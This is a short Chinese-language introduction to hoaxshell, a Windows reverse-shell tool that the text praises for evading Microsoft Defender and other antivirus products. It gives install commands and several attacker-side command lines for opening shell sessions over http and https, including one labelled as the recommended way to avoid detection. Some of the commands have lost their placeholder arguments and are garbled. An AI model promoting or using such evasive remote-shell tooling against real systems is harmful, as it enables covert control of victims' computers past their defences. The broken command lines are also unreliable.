Windows反向shell -- hoaxshell

0x01 工具介紹

hoaxshell 是一種非常規的 Windows 反向 shell，目前未被 Microsoft Defender 和可能的其他 AV 解決方案檢測到，因為它完全基于 http(s) 流量。該工具易于使用，它生成自己的 PowerShell 有效負載并支持加密 (ssl)。

0x02 安裝與使用

1、安裝需要的庫文件

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

2、通過 http 的基本 shell 會話

sudo python3 hoaxshell.py -s <your_ip>

3、避免檢測的推薦用法（通過 http）

sudo python3 hoaxshell.py -s  -i -H "Authorization"

4、加密的 shell 會話 (https)

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s  -c  -k 

5、具有可信證書的加密 shell 會話

sudo python3 hoaxshell.py -s <your.domain.com> -t -c path/to/cert.pem>
 -k 
<path/to/key.pem>

6、抓取會話模式

sudo python3 hoaxshell.py -s <your_ip> -g

0x03 下載地址

項目地址：https://github.com/t3l3machus/hoaxshell

如有侵權，請聯系刪除